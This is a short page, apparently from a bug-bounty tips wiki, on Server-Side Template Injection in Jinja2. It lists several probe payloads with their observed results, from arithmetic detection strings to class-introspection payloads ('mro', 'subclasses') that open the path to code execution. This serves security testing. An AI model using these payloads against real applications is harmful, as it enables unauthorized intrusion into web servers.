Book of BugBounty Tips
Search...
Ctrl
K
Server Side Template Injection
Previous
Web Cache
Next
Tips from @EdOverflow
Last updated
2 months ago
Good hunters to help me about Server-Side Template Injection (Jinja2) ?
{{7*'7'}} = 7777777
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %} = (1, 1, 1)(2, 2, 2)(3, 3, 3)
{{ [].class.base.subclasses() }} = Empty
{{''.class.mro()[1].subclasses()}} = Web app crash